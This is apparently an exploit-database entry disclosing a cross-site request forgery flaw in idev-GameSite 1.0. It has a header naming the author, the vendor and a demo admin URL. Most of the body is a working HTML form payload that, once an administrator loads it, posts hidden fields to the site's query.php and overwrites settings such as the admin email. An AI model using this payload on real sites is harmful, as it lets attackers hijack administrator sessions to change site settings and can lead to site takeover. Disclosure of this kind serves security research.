idev-GameSite version 1.0 suffers from a cross site request forgery vulnerability.
f8d5eb8db1aa975bb4833a4802e7b98059e06db124b5db90009c3c30e7e26ddf
# Exploit Title: idev-GameSite 1.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com/
# Category:: webapps
# Demo : http://idevspot.com/demos/idev-gamesite/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form action="../library/query.php?addphoto=1" method="post" name="form1" enctype="multipart/form-data" id="form1">
<input name="controller" value="SETTINGS~update~settings~1" type="hidden">
<input name="EMAIL" class="hiddenarea100" value="idevspot@gmail.com" type="hidden">
<input name="AFFID" class="hiddenarea100" value="" type="hidden">
<input name="Submit" value="Submit" type="submit">
</form>